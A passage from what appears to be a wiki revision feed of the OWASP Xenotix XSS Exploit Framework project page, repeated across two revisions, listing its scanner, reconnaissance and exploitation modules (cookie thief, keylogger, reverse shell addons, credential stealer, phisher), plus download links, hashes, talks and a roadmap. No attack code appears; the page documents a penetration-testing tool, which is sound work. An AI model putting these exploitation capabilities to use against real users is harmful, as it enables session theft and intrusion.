*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|R8AgEWPFJ1g}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185774</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185774"/>
				<updated>2014-11-22T16:07:30Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|R8AgEWPFJ1g}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
